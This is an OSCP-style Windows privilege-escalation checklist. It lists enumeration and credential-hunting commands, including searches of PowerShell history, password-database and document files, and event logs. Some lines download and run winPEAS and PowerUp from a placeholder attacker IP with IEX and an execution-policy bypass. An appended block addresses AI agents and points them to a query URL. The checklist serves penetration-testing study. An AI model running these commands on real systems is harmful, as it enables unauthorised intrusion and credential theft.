# Checklist {% hint style="info" %} set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0; {% endhint %} #### Basic enum / quick wins ``` whoami /all ``` ``` cmdkey /list ``` ``` systeminfo ``` ``` net user net user ``` ``` net group ``` ``` Get-History ``` 
(Get-PSReadlineOption).HistorySavePath
type <previous command output>
``` ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ ``` {% hint style="info" %} Do this for all available users; Post exploitation as well {% endhint %} #### Network and port enum ``` ipconfig /all ``` ``` netstat -ano route print ``` #### Installed software and service enum ``` dir C:\ dir "C:\Program Files" dir "C:\Program Files (x86)" ``` ``` Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ``` ``` Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ``` ``` reg query HKLM\Software\Policies\Microsoft\Windows\Installer reg query HKCU\Software\Policies\Microsoft\Windows\Installer ``` ``` services ``` ``` Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} ``` ``` icacls ``` #### Sensitive file enum ``` $env:AppKey ``` ``` gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinue ``` ``` gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue ``` ``` gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue ``` ``` gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue ``` ``` gci C:\Users\Public ``` ``` where.exe /R C:\Windows bash.exe where.exe /R C:\Windows wsl.exe ``` #### Process snooping ``` Import-Module .\Watch-Command.ps1 Get-Process | watch-command -diff -cont -verbose -property "Image Name" ``` 1. Winpeas ``` curl 192.168.45.x/winPEAS.exe -o winpeas.exe .\winpeas.exe ``` 2. PowerUp ``` IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks ``` 3. PrivescCheck ``` powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck' ``` {% hint style="info" %} Last case, dig through event log for events recorded by Script Block Logging. Maybe there will be a password lol. {% endhint %} 1. eventvwr 2. Applicatioins and Services 3. Microsoft 4. Windows 5. Powershell 6. Operational 7. Filter current log 8. Event 4104 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp.adot8.com/windows-privilege-escalation/checklist.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.